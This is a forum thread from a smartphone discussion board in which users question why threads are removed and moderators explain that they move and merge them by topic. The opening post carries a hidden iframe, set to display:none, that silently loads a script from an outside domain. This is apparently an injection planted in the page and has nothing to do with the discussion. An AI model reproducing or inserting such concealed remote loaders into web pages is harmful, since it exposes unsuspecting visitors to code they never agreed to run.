+ Reply to Thread
Page 1 of 2 1 2 LastLast

New Threads being removed

Any reason why new threads posted are removed from this board for some authors while other meaningless (useless) threads are left up?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    pvm

ok guys let's move this one to the trash

Same question here.

Can you give examples? I can only think of one at this point, dealing with the march madness for the cell phones. I think that belongs in the 7135 discussion.

That one was moved to General....

B.

Not that anyone asked me, but as the author of one of the March Madness threads, I agree with the decision to move it. By the way, I was a sysop on a Compuserve forum for almost 20 years, and I certainly appreciate the care that the discussion board managers here have taken to maintain all of smartphonesource.com.

I moved this thread to the Site News/Ideas thread, b/c it deals with how the "site" works, and not how the 7135 works....

Now, on to the question, the moderators move some threads that would fit better or get a better response in another category...for instance, this thread does not directly relate to the 7135, but more directly relates to how "Smartphonesource.com" works...therefore it really doesn't belong in the 7135 category.

As far as threads getting "removed" perhaps they were merged with another thread discussing the same issue. This helps prevent the board from getting overcluttered.

And, as far as "meaningless" threads, could you give examples?
    --Jazz--

Administrator
    agreed. if i move merge a thread i will send a pm to the author of the post to let him know where it is... unless it was moved to a thread with the same or similar topic. most of the time a post is merged with another thread already discussing the issue..

as long as the person is aware of where the post goes, there should not be a problem IMO... each section of this forum gets looked at on a daily basis. :UpThum

jeh